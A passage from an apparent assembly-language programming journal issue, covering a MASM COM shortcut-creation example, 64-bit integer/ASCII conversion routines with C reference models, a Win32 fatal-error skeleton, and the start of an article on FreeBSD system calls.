     jmp lbl
sztext:
     db Text,0
lbl:
     invoke MessageBox,NULL,sztext,ADDR szAppName,MB_OK
     ENDM

;---------------------------------------------------------------------
.data

szAppName         BYTE        "Shell Link Maker", 0

szLinkName        BYTE        "Shortcut to MakeLink.lnk", 0
szBKSlash             BYTE         "\", 0

hInstance         HINSTANCE   ?
Pos               DWORD       ?

szBuffer1           BYTE           MAX_PATH DUP(?)
szBuffer2           BYTE           MAX_PATH DUP(?)

;-----------------------------------------------------------------------
.code
start:

;---------------------------------------------
;  this bracketed code is just a 'quick hack'
;  to replace the filename from the filepathname
;  with the 'Shortcut to' title
;
     invoke GetModuleHandle, NULL
     mov hInstance, eax
     invoke GetModuleFileName, NULL, ADDR szBuffer1, MAX_PATH
     invoke lstrcpy, ADDR szBuffer2, ADDR szBuffer1
     ; Find the last backslash '\' and end the string right after it
     mov edx, OFFSET szBuffer2
     mov ecx, edx
     .REPEAT
         mov al, BYTE PTR [edx]
         .IF al == 92 ; "\"
             mov ecx, edx
         .ENDIF
         inc edx
     .UNTIL  al == 0
     mov BYTE PTR [ecx+1], 0
     ; append the link name to the directory part
     invoke lstrcat, ADDR szBuffer2, ADDR szLinkName
;----------------------------------------------

; here is where we call the proc with the COM methods
     invoke CoInitialize, NULL
     MakeMessage "Let's try our Createlink."
     invoke CoCreateLink, ADDR szBuffer1, ADDR szBuffer2
     MakeMessage "That's all folks !!!"
     invoke CoUninitialize
     invoke ExitProcess, NULL

;-----------------------------------------------------------------------
CoCreateLink PROC pszPathObj:DWORD, pszPathLink:DWORD
; CreateLink - uses the shell's IShellLink and IPersistFile interfaces
;   to create and store a shortcut to the specified object.
; Returns the hresult of calling the member functions of the interfaces.
; pszPathObj - address of a buffer containing the path of the object.
; pszPathLink - address of a buffer containing the path where the
;   shell link is to be stored.
; adapted from MSDN article "Shell Links"
;  deleted useless "description" method
;  added set icon location method

     LOCAL   pwsz    :DWORD
     LOCAL   psl     :DWORD
     LOCAL   ppsl    :DWORD
     LOCAL   ppf     :DWORD
     LOCAL   pppf    :DWORD
     LOCAL   hResult :DWORD
     LOCAL   hHeap   :DWORD

.data
CLSID_ShellLink     GUID        <0021401H, 0000H, 0000H,                  \
                                 <0C0H, 00H, 00H, 00H, 00H, 00H, 00H, 046H>>
IID_IShellLink      GUID        <00214EEH, 0000H, 0000H,                  \
                                 <0C0H, 00H, 00H, 00H, 00H, 00H, 00H, 046H>>
IID_IPersistFile    GUID        <000010BH, 0000H, 0000H,                  \
                                 <0C0H, 00H, 00H, 00H, 00H, 00H, 00H, 046H>>

.code
     ; first, get some heap for a wide buffer
     invoke GetProcessHeap
     mov hHeap, eax
     invoke HeapAlloc, hHeap, NULL, MAX_PATH * 2
     mov pwsz, eax
     ; and set up some local pointers (we can't use ADDR on local vars)
     lea eax, psl
     mov ppsl, eax
     lea eax, ppf
     mov pppf, eax
     ; Get a pointer to the IShellLink interface.
     invoke CoCreateInstance, ADDR CLSID_ShellLink, NULL,
                              CLSCTX_INPROC_SERVER,
                              ADDR IID_IShellLink, ppsl
     mov hResult, eax
     test eax, eax
     .IF SUCEEDED
         ; Query IShellLink for the IPersistFile
         ; interface for saving the shortcut
         coinvoke psl, IShellLink, QueryInterface, ADDR IID_IPersistFile, pppf
         mov hResult, eax
         test eax, eax
         .IF SUCEEDED
             ; Set the path to the shortcut target
             coinvoke psl, IShellLink, SetPath, pszPathObj
             mov hResult, eax
             ; set the icon location; use the first icon found (index 0)
             coinvoke psl, IShellLink, SetIconLocation, pszPathObj, 0
             mov hResult, eax
             ; change string to Unicode. (COM typically expects Unicode
             ; strings)
             invoke MultiByteToWideChar, CP_ACP, 0, pszPathLink, -1, pwsz,
                                         MAX_PATH
             ; Save the link by calling IPersistFile::Save
             coinvoke ppf, IPersistFile, Save, pwsz, TRUE
             mov hResult, eax
             ; release the IPersistFile ppf pointer
             coinvoke ppf, IPersistFile, Release
             mov hResult, eax
         .ENDIF
         ; release the IShellLink psl pointer
         coinvoke psl, IShellLink, Release
         mov hResult, eax
     .ENDIF
     ; free our heap space
     invoke HeapFree, hHeap, NULL, pwsz
     mov eax, hResult    ; since we reuse this variable over and over,
                         ;  it contains the last operation's result
     ret
CoCreateLink ENDP
;-----------------------------------------------------------

end start
;-----------------------------------------------------------------------


Bibliography:
-------------
"Inside COM, Microsoft's Component Object Model" Dale Rogerson
     Copyright 1997, Paperback - 376 pages CD-ROM edition
     Microsoft Press; ISBN: 1572313498
(THE fundamental book on understanding how COM works on a fundamental level.
Uses C++ code to illustrate basic concepts as it builds a simple, fully
functional COM object.)

"Automation Programmer's Reference : Using ActiveX Technology to Create
     Programmable Applications" (no author listed)
     Copyright 1997, Paperback - 450 pages
     Microsoft Press; ISBN: 1572315849
(This book has been available online on MSDN in the past, but it is cheap
enough for those of you who prefer real books you can hold in your hand.
Defines the practical interfaces and functions that the automation libraries
provide you, but is more of a reference book than a "user's guide")

Microsoft Developers Network
     http://msdn.microsoft.com

"Professional Visual C++ 5 ActiveX/Com Control Programming" Sing Li
     and Panos Economopoulos
     Copyright April 1997, Paperback - 500 pages (no CD, files available
     online)
     Wrox Press Inc; ISBN: 1861000375
(Excellent description of ActiveX control and control site interfaces.
A recent review of this book on Amazon.com stated "These guys are the
type that want to rewrite the world's entire software base in
assembler."  Need I say more?)

"sean's inconsequential homepage"
     http://www.eburg.com/~baxters/
Various hardcore articles on low-level COM and ATL techniques. Coded in C++

"Using COM in Assembly Language" Bill Tyler
     Assembly Language Journal, Apr-June 99
Mr Tyler keeps a web site at:
http://thunder.prohosting.com/~asm1/



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                             64-bit Integer/ASCII Conversion
                                             by X-Calibre


The following routines provide an assembly-language library for converting
64-bit integers to and from ASCII, such as would be required when preparing
user-supplied data for qword arithmetic or FPU instructions. The library
consists of the routines ParseRadixSigned, ParseRadixUnsigned,
PrintRadixSigned, and PrintRadixUnsigned, and the macro Divide64. Wrappers
for calling the routines from C code have also been provided.


ParseRadix
----------
ParseRadix is a pair of routines for converting an ASCII string to a signed
or unsigned 64-bit integer, using a given radix as a base. The routines take
a pointer to a string and an integer radix as input, and return a 64-bit
number.

;-------------------------------------------------------------------------
ParseRadixUnsigned  PROC
; Input:  Pointer to zero-terminated string in ESI, radix in EDI
; Output: Parsed number in EDX::EAX
; Uses:        EAX, EBX, ECX, EDX, ESI, EDI

      xor       ebx, ebx

      ; result in EDX::EAX
      xor       eax, eax
      xor       edx, edx

      mov       al, [esi]
      inc       esi
      test eax, eax
      jz        @@endOfParsing

      sub       eax, 30h
      .IF eax > 9
           sub       eax, 7
      .ENDIF

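      mov       bl, [esi]
      ; A single-digit string ends here.
      test ebx, ebx
      jz        @@endOfParsing

@@smallParseLoop:
      ; ASCII to number conversion
      sub       ebx, 30h
      inc       esi
      mul       edi
      .IF ebx > 9
           sub       ebx, 7
      .ENDIF
      add       eax, ebx
      mov       bl, [esi]
      ; Fold the carry into the high dword. Once EDX is non-zero the
      ; result no longer fits in 32 bits and the 64-bit loop takes over.
      adc       edx, 0
      jnz       @@carry
      test ebx, ebx
      jnz       @@smallParseLoop

      ret

@@carry:
      test ebx, ebx
      jz        @@endOfParsing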

@@bigParseLoop:
      ; ASCII to number conversion
      mov       ecx, eax
      mov       eax, edx
      sub       ebx, 30h
      inc       esi
      mul       edi
      xchg eax, ecx
      mul       edi
      .IF ebx > 9
           sub       ebx, 7
      .ENDIF
      add       eax, ebx
      mov       bl, [esi]
      adc       edx, ecx

      test ebx, ebx
      jnz       @@bigParseLoop

@@endOfParsing:
      ret
ParseRadixUnsigned  ENDP

ParseRadixSigned    PROC
; Input:  Pointer to zero-terminated string in ESI, radix in EDI
; Output: Parsed number in EDX::EAX
; Uses:        EAX, EBX, ECX, EDX, ESI, EDI

      .code
      ; If string does not start with a '-', consider it positive
      cmp       byte ptr [esi], '-'
      jne       ParseRadixUnsigned

      ; Number is negative, first parse the absolute value
      inc       esi

      call ParseRadixUnsigned

      ; Now negate the absolute value to get the negative result
      neg       edx
      neg       eax
      sbb       edx, 0

      ret
ParseRadixSigned    ENDP
;-------------------------------------------------------------------------
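
A plain C model of the same conversion can be handy for checking results
from the assembly routines. The sketch below is not part of the library; the
function names are hypothetical and it assumes a compiler that provides
<stdint.h>. Like the assembly, it accepts '0'-'9' and upper-case 'A'-'Z'
only, does no validation of the characters, and lets the value wrap around
on overflow.

```c
#include <assert.h>
#include <stdint.h>

/* Reference model: parse a zero-terminated string in the given radix. */
uint64_t parse_radix_unsigned(const char *s, uint32_t radix)
{
    uint64_t value = 0;

    assert(radix >= 2 && radix <= 36);
    for (; *s != '\0'; ++s) {
        /* '0'..'9' map to 0..9 */
        uint32_t digit = (uint32_t)(unsigned char)*s - 0x30u;
        if (digit > 9)
            digit -= 7;             /* 'A'..'Z' map to 10..35 */
        /* value = value * radix + digit, wrapping modulo 2^64 */
        value = value * radix + digit;
    }
    return value;
}

/* Signed variant: a leading '-' negates the parsed magnitude. */
int64_t parse_radix_signed(const char *s, uint32_t radix)
{
    if (*s != '-')
        return (int64_t)parse_radix_unsigned(s, radix);
    /* Negate in unsigned arithmetic, the C counterpart of the
       NEG / NEG / SBB sequence; the cast assumes two's complement. */
    return (int64_t)((uint64_t)0 - parse_radix_unsigned(s + 1, radix));
}
```

Strings worth trying against the assembly are a single digit such as "7",
the empty string, and values just past 32 bits such as "50000000000".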

The following is a wrapper used for calling the ParseRadix routines from C.
The wrapper provides the following C functions:

extern unsigned __int64 __stdcall
         ParseRadixUnsignedC(char *lpBuffer,  unsigned int radix);

extern signed __int64 __stdcall
         ParseRadixSignedC(char *lpBuffer, unsigned int radix);

;-------------------------------------------------------------------------
.386
.Model Flat, StdCall

.code
include ParseRadix.asm

ParseRadixUnsignedC PROC lpBuffer:PTR BYTE, radix:DWORD
      push esi
      mov       esi, [lpBuffer]
      push edi
      mov       edi, [radix]
      push ebx

      call ParseRadixUnsigned

      pop       ebx
      pop       edi
      pop       esi

      ret
ParseRadixUnsignedC ENDP

ParseRadixSignedC   PROC lpBuffer:PTR BYTE, radix:DWORD
      push esi
      mov       esi, [lpBuffer]
      push edi
      mov       edi, [radix]
      push ebx

      call ParseRadixSigned

      pop       ebx
      pop       edi
      pop       esi

      ret
ParseRadixSignedC   ENDP

END
;-------------------------------------------------------------------------


Divide64
--------
Divide64 is a macro for doing 64-bit division using 32-bit integer
instructions. Note that this is a 'long division' algorithm. It can easily
be expanded to divide a dividend of any size by a 32-bit divisor. I only use
it for 64 bits here, to keep the CPU from raising a divide exception when
the quotient does not fit in 32 bits (that is, when the high dword of the
dividend is not smaller than the divisor), so that printing any 64-bit
number with any radix is possible.

;-------------------------------------------------------------------------
Divide64       MACRO
; Input:  64 bit dividend in EBX::ECX, 32 bit divisor in ESI
; Output: 64 bit result in EBX::EAX, 32 bit remainder in EDX
; Uses:        EAX, EBX, ECX, EDX, ESI

      ; Divide high dword by divisor.
      mov       eax, ebx
      xor       edx, edx
      div       esi
      ; Save the high dword of the quotient. The remainder stays in EDX,
      ; where it serves as the high dword of the second division.
      mov       ebx, eax
      mov       eax, ecx
      div       esi

ENDM
;-------------------------------------------------------------------------
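
The two-step division can be written out in C to make the reasoning visible.
This is a sketch with names of my own choosing, assuming <stdint.h> is
available; it mirrors the macro's register use (high and low dword in,
64-bit quotient and 32-bit remainder out) rather than replacing it.

```c
#include <assert.h>
#include <stdint.h>

/* Long division of the 64-bit value hi:lo by a 32-bit divisor, done as
   two divisions whose quotients each fit in 32 bits. */
uint64_t divide64(uint32_t hi, uint32_t lo, uint32_t divisor,
                  uint32_t *remainder)
{
    uint32_t q_hi, r_hi, q_lo;
    uint64_t partial;

    assert(divisor != 0);

    /* Step 1: divide the high dword on its own. */
    q_hi = hi / divisor;
    r_hi = hi % divisor;

    /* Step 2: the remainder becomes the high dword of the next dividend.
       Because r_hi < divisor, this quotient cannot exceed 32 bits. */
    partial = ((uint64_t)r_hi << 32) | lo;
    q_lo = (uint32_t)(partial / divisor);
    *remainder = (uint32_t)(partial % divisor);

    return ((uint64_t)q_hi << 32) | q_lo;
}
```

The comment in step 2 is the whole point: a single DIV would fault whenever
hi is not smaller than the divisor, while the split version never produces a
quotient wider than the register that receives it.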


PrintRadix
----------
PrintRadix is a pair of routines for converting signed and unsigned 64-bit
numbers to an ASCII string, using a given radix as base. These routines take
a 64-bit number, an integer radix, and a pointer to a character buffer as
input, write the string to that buffer, and return its length.

;-------------------------------------------------------------------------
PrintRadixUnsigned  PROC
; Input:  64 bit unsigned number in EBX::ECX, radix in ESI, pointer to
;           output buffer in EDI
; Output: Zero-terminated ASCII string in output buffer, length of string in
;           EAX
; Uses:        EAX, EBX, ECX, EDX, ESI, EDI, EBP

      xor       ebp, ebp  ; StringLength counter

      ; If the high dword of the number is not smaller than the divisor,
      ; we have to do a 'long division' to prevent overflow.
      cmp       ebx, esi
      jb        smallDiv

longDiv:
      Divide64

      ; Convert the remainder to an ASCII char.
      add       edx, 30h
      dec       esp
      .IF  edx > 39h
           add       edx, 7
      .ENDIF

      ; Store char on stack.
      inc       ebp
      ; While result is not 0, we loop.
      test eax, eax
      mov       ecx, eax
      mov       [esp], dl
      jz        lowDWORDIsZero

      cmp       ebx, esi
      jae       longDiv

smallDiv:
      ; Set EBX::ECX to EDX::EAX for a normal 64->32 division.
      mov       edx, ebx
      mov       eax, ecx

radixLoopSmall:
      div       esi

      ; Convert the remainder to an ASCII char.
      add       edx, 30h
      dec       esp
      .IF  edx > 39h
           add       edx, 7
      .ENDIF

      ; Store char on stack.
      inc       ebp
      mov       [esp], dl
      ; Clean out high dword for next division.
      xor       edx, edx
      ; While result is not 0, we loop.
      test eax, eax
      jnz       radixLoopSmall

toBuffer:
      mov       eax, ebp  ; Return stringlength (not including 0-terminator)

toBufferLoop:
      ; Copy the string from stack to the destination buffer.
      inc       edi
      mov       dl, [esp]
      inc       esp
      dec       ebp
      mov       [edi-1], dl
      jnz       toBufferLoop

      ; Zero terminate the string.
      mov       byte ptr [edi], 0

      ret

lowDWORDIsZero:
      test ebx, ebx
      jnz       longDiv

      ; We have the final string, time to copy it to the destination buffer.
      jmp       toBuffer
PrintRadixUnsigned  ENDP

PrintRadixSigned    PROC
; Input:  64 bit signed number in EBX::ECX, radix in ESI, pointer to output
;           buffer in EDI
; Output: Zero-terminated ASCII string in output buffer, length of string in
;           EAX
; Uses:        EAX, EBX, ECX, EDX, ESI, EDI, EBP

      ; If number is non-negative, use the normal PrintRadix
      test ebx, ebx
      jns       PrintRadixUnsigned

      ; Prefix the number with a - sign
      mov       byte ptr [edi], '-'
      inc       edi

      ; Negate the 64 bit number
      neg       ebx
      neg       ecx
      sbb       ebx, 0

      ; Do a normal PrintRadix
      call PrintRadixUnsigned
      inc       eax
      ret
PrintRadixSigned    ENDP
;-------------------------------------------------------------------------
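
For comparison, here is the same digit-by-digit scheme in C: divide
repeatedly by the radix, collect the remainders (which come out least
significant digit first), then reverse them into the caller's buffer. The
names are hypothetical and the temporary array stands in for the bytes the
assembly version pushes on the stack. It assumes <stdint.h> and an output
buffer of at least 66 bytes (sign, 64 binary digits, terminator).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Writes value in the given radix to out, zero-terminated.
   Returns the string length, not counting the terminator. */
size_t print_radix_unsigned(uint64_t value, uint32_t radix, char *out)
{
    char tmp[64];               /* worst case: 64 digits in radix 2 */
    size_t n = 0, i;

    assert(radix >= 2 && radix <= 36);
    do {
        uint32_t digit = (uint32_t)(value % radix);
        /* 0..9 become '0'..'9', 10..35 become 'A'..'Z' */
        tmp[n++] = (char)(digit < 10 ? '0' + digit : 'A' + (digit - 10));
        value /= radix;
    } while (value != 0);

    /* Digits were produced in reverse order; copy them back to front. */
    for (i = 0; i < n; ++i)
        out[i] = tmp[n - 1 - i];
    out[n] = '\0';
    return n;
}

/* Signed variant: emits '-' and prints the magnitude. */
size_t print_radix_signed(int64_t value, uint32_t radix, char *out)
{
    if (value >= 0)
        return print_radix_unsigned((uint64_t)value, radix, out);
    out[0] = '-';
    /* Negate in unsigned arithmetic so the most negative value is safe. */
    return 1 + print_radix_unsigned((uint64_t)0 - (uint64_t)value,
                                    radix, out + 1);
}
```

As in the assembly, the returned length of the signed variant includes the
minus sign.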

The following is a wrapper used for calling the PrintRadix routines from C.
The wrapper provides the following C functions:

extern unsigned int __stdcall
         PrintRadixUnsignedC(char *lpBuffer, unsigned __int64 number,
                             unsigned int radix);

extern unsigned int __stdcall
         PrintRadixSignedC(char *lpBuffer, signed __int64 number,
                           unsigned int radix);

;-------------------------------------------------------------------------
.386
.Model Flat, StdCall

.code
include PrintRadix.asm

PrintRadixUnsignedC      PROC lpBuffer:PTR BYTE, number:QWORD, radix:DWORD
      push ebp
      mov       ecx, dword ptr [number]
      push ebx
      mov       ebx, dword ptr [number+sizeof DWORD]
      push esi
      mov       esi, [radix]
      push edi
      mov       edi, [lpBuffer]

      call PrintRadixUnsigned

      pop       edi
      pop       esi
      pop       ebx
      pop       ebp

      ret
PrintRadixUnsignedC      ENDP

PrintRadixSignedC        PROC lpBuffer:PTR BYTE, number:QWORD, radix:DWORD
      push ebp
      mov       ecx, dword ptr [number]
      push ebx
      mov       ebx, dword ptr [number+sizeof DWORD]
      push esi
      mov       esi, [radix]
      push edi
      mov       edi, [lpBuffer]

      call PrintRadixSigned

      pop       edi
      pop       esi
      pop       ebx
      pop       ebp

      ret
PrintRadixSignedC        ENDP
END
;-------------------------------------------------------------------------



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                                  Win32 AppFatalExit Skeleton
                                                  by Chili


This is just a Win32 application skeleton with a small procedure that
manages fatal errors by displaying an information message box and
terminating the process.

I think the code is pretty much self-explanatory and I commented it to some
degree, so there's not much to say. To close the black window just hit
ESCAPE.

The one thing that isn't quite right is the fact that you have to code the
line numbers by hand, so if you change anything above previously coded
numbers, you'll have to do them again... oh well!

To assemble get the MASM32 package from: http://www.pbq.com.au/home/hutch/

--8<---------------------------------------------------------------------------

; SKELETON.ASM
; Win32 AppFatalExit Skeleton
; by Chili for APJ #8
; August 11, 2000

;##############################################################################
; Compiler Options
;##############################################################################

     title Win32 AppFatalExit Skeleton

     .386
     .model flat, stdcall    ; 32-bit memory model
     option casemap :none    ; case sensitive

;##############################################################################
; Includes
;##############################################################################

     ;// Include Files
     include \masm32\include\windows.inc
     include \masm32\include\gdi32.inc
     include \masm32\include\user32.inc
     include \masm32\include\kernel32.inc
     include \masm32\include\comctl32.inc
     include \masm32\include\comdlg32.inc
     include \masm32\include\shell32.inc

     ;// Libraries
     includelib \masm32\lib\gdi32.lib
     includelib \masm32\lib\user32.lib
     includelib \masm32\lib\kernel32.lib
     includelib \masm32\lib\comctl32.lib
     includelib \masm32\lib\comdlg32.lib
     includelib \masm32\lib\shell32.lib

;##############################################################################
; Equates
;##############################################################################

     ;// Basic
     NULL    equ 0
     FALSE   equ 0
     TRUE    equ 1

;##############################################################################
; Local Prototypes
;##############################################################################

     ;// Main Program Procedures.
     WinMain         PROTO   :DWORD, :DWORD, :DWORD, :DWORD
     WndProc         PROTO   :DWORD, :DWORD, :DWORD, :DWORD
     AppFatalExit    PROTO   :DWORD, :DWORD

;##############################################################################
; Local Macros
;##############################################################################

     ;// Return a value in EAX.

     return MACRO arg
         IFNB <arg>
             mov     eax, arg
         ENDIF
         ret
     ENDM

     ;// Memory-to-memory MOV.

     m2m MACRO m1:REQ, m2:REQ
         push    m2
         pop     m1
     ENDM

     ;// Memory copy.

     mcopy MACRO destination:REQ, source:REQ
         cld
         lea     esi, source
         lea     edi, destination
         mov     ecx, sizeof source
     rep movsb
     ENDM

     ;// Insert zero terminated string into code section.

     szText MACRO name:REQ, text:VARARG
         LOCAL   lbl
         jmp     lbl
         name    db  text, 0
       lbl:
     ENDM

     ;// Insert zero terminated string into .data section.

     dszText MACRO name:REQ, text:VARARG
     .data
         name    db  text, 0
     .code
     ENDM

     ;// Return in EBX the ASCII size of a DWORD value

     dwsize MACRO value:REQ
         xor     ebx, ebx
         mov     eax, value
         .if eax == 0
             inc     ebx
         .else
             mov     ecx, 10
             .while eax > 0
                 xor     edx, edx
                 div     ecx
                 inc     ebx
             .endw
         .endif
     ENDM

;##############################################################################
; Initialized Data Section
;##############################################################################

.data

;##############################################################################
; Uninitialized Data Section
;##############################################################################

.data?

;##############################################################################
; Constants Section
;##############################################################################

.const

;##############################################################################
; Code Section
;##############################################################################

.code

;==============================================================================
; Beginning of executable code
;==============================================================================
start   proc

     ;// Do some base initialization for the WinMain function and upon its
     ;// ending, terminate process.

     LOCAL   hModule :DWORD

     ;// Get handle to current instance.

     invoke  GetModuleHandle, NULL
     .IF eax == NULL
         dszText szGetModuleHandle_157, "GetModuleHandle, ln #157"
         invoke  AppFatalExit, addr szGetModuleHandle_157,
                               sizeof szGetModuleHandle_157
     .ENDIF
     mov     hModule, eax

     ;// Get pointer to the command-line string for the current process.

     invoke  GetCommandLine

     ;// Call initial entry point for a Win32-based application.

     invoke  WinMain, hModule, NULL, eax, SW_SHOWMAXIMIZED

     ;// End process and all its threads.

     invoke  ExitProcess, eax

start   endp

;==============================================================================
; WinMain Function (Called by the system as the initial entry point for a
;                   Win32-based application)
;==============================================================================
WinMain proc    hInstance       :DWORD, ;// handle to current instance
                 hPrevInstance   :DWORD, ;// handle to previous instance
                 lpCmdLine       :DWORD, ;// pointer to command line
                 nCmdShow        :DWORD  ;// show state of window

     ;// Perform initialization, create and display a main window and enter a
     ;// message retrieval-and-dispatch loop.

     LOCAL   wc          :WNDCLASSEX
     LOCAL   hwndMain    :DWORD
     LOCAL   msg         :MSG

     ;// Register the window class for the main window.

     mov     wc.cbSize, sizeof WNDCLASSEX
     mov     wc.style, CS_OWNDC
     mov     wc.lpfnWndProc, offset MainWndProc
     mov     wc.cbClsExtra, 0
     mov     wc.cbWndExtra, 0
     m2m     wc.hInstance, hInstance
     invoke  LoadIcon, NULL, IDI_APPLICATION
     .if eax == NULL
         dszText szLoadIcon_203, "LoadIcon, ln #203"
         invoke  AppFatalExit, addr szLoadIcon_203, sizeof szLoadIcon_203
     .endif
     mov     wc.hIcon, eax
     invoke  LoadCursor, NULL, IDC_ARROW
     .if eax == NULL
         dszText szLoadCursor_209, "LoadCursor, ln #209"
         invoke  AppFatalExit, addr szLoadCursor_209, sizeof szLoadCursor_209
     .endif
     mov     wc.hCursor, eax
     invoke  GetStockObject, BLACK_BRUSH
     .if eax == NULL
         dszText szGetStockObject_215, "GetStockObject, ln #215"
         invoke  AppFatalExit, addr szGetStockObject_215,
                               sizeof szGetStockObject_215
     .endif
     mov     wc.hbrBackground, eax
     mov     wc.lpszMenuName, NULL
     dszText  szClassName, "MainWndClass"
     mov     wc.lpszClassName, offset szClassName
     mov     wc.hIconSm, NULL

     invoke  RegisterClassEx, addr wc
     .if eax == 0
         dszText szRegisterClassEx_227, "RegisterClassEx, ln #227"
         invoke  AppFatalExit, addr szRegisterClassEx_227,
                               sizeof szRegisterClassEx_227
     .endif

     ;// Create the main window.

     dszText szDisplayName, "Win32 AppFatalExit Skeleton"
     invoke  CreateWindowEx, NULL, addr szClassName, addr szDisplayName,
                             WS_POPUP or WS_CLIPSIBLINGS or WS_MAXIMIZE or \
                             WS_CLIPCHILDREN, CW_USEDEFAULT, CW_USEDEFAULT,
                             CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL,
                             hInstance, NULL

     ;// If the main window cannot be created, terminate the application.

     .if eax == NULL
         dszText szCreateWindowEx_237, "CreateWindowEx, ln #237"
         invoke  AppFatalExit, addr szCreateWindowEx_237,
                               sizeof szCreateWindowEx_237
     .endif
     mov     hwndMain, eax

     ;// Show the window and paint its contents.

     invoke  ShowWindow, hwndMain, nCmdShow
     invoke  UpdateWindow, hwndMain
     .if eax == NULL
         dszText szUpdateWindow_255, "UpdateWindow, ln #255"
         invoke  AppFatalExit, addr szUpdateWindow_255,
                               sizeof szUpdateWindow_255
     .endif

     ;// Start the message loop.

     .while TRUE
         invoke  PeekMessage, addr msg, NULL, 0, 0, PM_REMOVE
         .if (eax != 0)
             .break .if msg.message == WM_QUIT

             invoke  TranslateMessage, addr msg
             invoke  DispatchMessage, addr msg
         .endif
     .endw

     ;// Return the exit code to Windows.

     return  msg.wParam

WinMain endp

;==============================================================================
; WindowProc Function (Application-defined callback function that processes
;                      messages sent to a window)
;==============================================================================
MainWndProc proc    hwnd    :DWORD, ;// handle of window
                     uMsg    :DWORD, ;// message identifier
                     wParam  :DWORD, ;// first message parameter
                     lParam  :DWORD  ;// second message parameter

     ;// Dispatch the messages that can be received.

     .if uMsg == WM_KEYDOWN

         ;// Process keyboard input by means of a key press.

         .if wParam == VK_ESCAPE

             ;// Clean up window-specific data objects.

             invoke  PostQuitMessage, NULL
             return  0
         .endif

     .elseif uMsg == WM_DESTROY

         ;// Clean up window-specific data objects.

         invoke  PostQuitMessage, NULL
         return  0
     .endif

     ;// Process other messages.

     invoke  DefWindowProc, hwnd, uMsg, wParam, lParam

     ret

MainWndProc endp

;==============================================================================
; Application Fatal Exit Procedure
;==============================================================================
AppFatalExit    proc    lpszCaption :DWORD, ;// pointer to string to display in
                         \                   ;// caption of the message box
                         nSize       :DWORD  ;// size of caption

     ;// Display a message box and terminate.

     LOCAL   uExitCode       :DWORD
     LOCAL   lpBuffer        :DWORD
     LOCAL   szFatalMessage  [256]:BYTE
     LOCAL   nSizeMsg        :DWORD
     LOCAL   szFatalCaption  [64]:BYTE

     ;// Get the calling thread's last-error code value.

     invoke  GetLastError
     mov     uExitCode, eax

     ;// Obtain error message string.

     invoke  FormatMessage, FORMAT_MESSAGE_ALLOCATE_BUFFER or \
                            FORMAT_MESSAGE_FROM_SYSTEM, NULL, uExitCode, 0,
                            addr lpBuffer, 0, NULL
     .if eax == NULL
         dwsize  uExitCode
         mov     nSizeMsg, ebx
         invoke  GetLastError
         push    eax
         dwsize  eax
         add     nSizeMsg, ebx
         pop     eax
         dszText szDoubleFmt, "#%lu [& #%lu]"
         invoke  wsprintf, addr szFatalMessage, addr szDoubleFmt, uExitCode,
                           eax
         add     nSizeMsg, 7
         .if eax != nSizeMsg
             dszText szDoubleMessage, "#??? [& #???]"
             mcopy   szFatalMessage, szDoubleMessage
         .endif
     .else
         mov     nSizeMsg, eax
         dwsize  uExitCode
         add     nSizeMsg, ebx
         dszText szFmt, "#%lu - %s"
         invoke  wsprintf, addr szFatalMessage, addr szFmt, uExitCode,
                           lpBuffer
         add     nSizeMsg, 4
         .if eax != nSizeMsg
             dszText szMessage, "#??? - ?????"
             mcopy   szFatalMessage, szMessage
         .endif
         invoke  LocalFree, lpBuffer ;// Possible errors in LocalFree ignored
     .endif

     ;// Display the application fatal exit message box.

     dszText szCaptionFmt, "Fatal: %s"
     invoke  wsprintf, addr szFatalCaption, addr szCaptionFmt, lpszCaption
     add     nSize, 6
     .if eax != nSize
         dszText szCaption, "Fatal: ?????, ln #???"
         mcopy   szFatalCaption, szCaption
     .endif
     invoke  MessageBox, NULL, addr szFatalMessage, addr szFatalCaption,
                         MB_ICONHAND or MB_SYSTEMMODAL

     ;// End process and all its threads.

     invoke  ExitProcess, eax

AppFatalExit    endp

end start
---------------------------------------------------------------------------8<--
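
The dwsize macro in the listing above counts how many decimal digits a DWORD
needs, so that AppFatalExit can predict the length wsprintf should return and
fall back to a fixed string when the two disagree. A minimal C sketch of the
same arithmetic follows; the names decimal_width and expected_length are made
up for illustration and do not appear in the listing.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Number of decimal digits needed to print value (same loop as dwsize). */
unsigned decimal_width(uint32_t value)
{
    unsigned digits = 0;

    if (value == 0)
        return 1;               /* "0" still takes one character */
    while (value > 0) {
        value /= 10;            /* drop the lowest digit */
        digits++;
    }
    return digits;
}

/* Length wsprintf should report for "#%lu - %s": the digits, the message
   text, and the four literal characters '#', ' ', '-', ' '. */
size_t expected_length(uint32_t code, const char *message)
{
    assert(message != NULL);
    return decimal_width(code) + strlen(message) + 4;
}
```

For error code 5 and a 17-character message, expected_length gives 1 + 17 + 4,
which is the value the listing compares against the wsprintf return.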



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
                                                      System Calls in FreeBSD
                                                      by G. Adam Stanislav


Assembly language programming under Unix is largely undocumented. It is
generally assumed that no one would ever want to use it because various Unix
systems run on different microprocessors, so everything should be written in
C for portability.

Now, we know that C portability is a myth. Even C programs need to be
modified when ported from one Unix to another, regardless of what processor
each runs on.

I was pleasantly surprised when one of the FreeBSD hackers recently posted an
assembly language 'Hello, World' program on the web. See
http://home.ptd.net/~tms2/hello.html for what he has to say.

There were two things I did not like in his example:

First of all, he uses the GNU assembler with its AT&T syntax. Talk about lack
of portability! When I got involved in Unix programming, I switched from MASM
to NASM and never looked back. NASM allows me to use the same code for
Windows and Unix with only minor modifications needed wherever system calls
are necessary. Everything else remains the same. I also like the fact I can
use dots in the middle of a label.

Secondly, he uses a separate procedure for the system call. It looks like this
(in AT&T syntax):

         do_syscall:
                 int     $0x80           # Call kernel.
                 ret

He says a direct use of int 80h would not work. I refused to believe it, and
I was right. The "problem" he is solving by using a separate procedure is the
fact that int 80h is optimized for use with C programs, which call functions
like write() and read(). Because they make a call, an extra DWORD (the return
address) is on the stack by the time int 80h is invoked.

His solution works, of course, but is unnecessary. All that is needed is
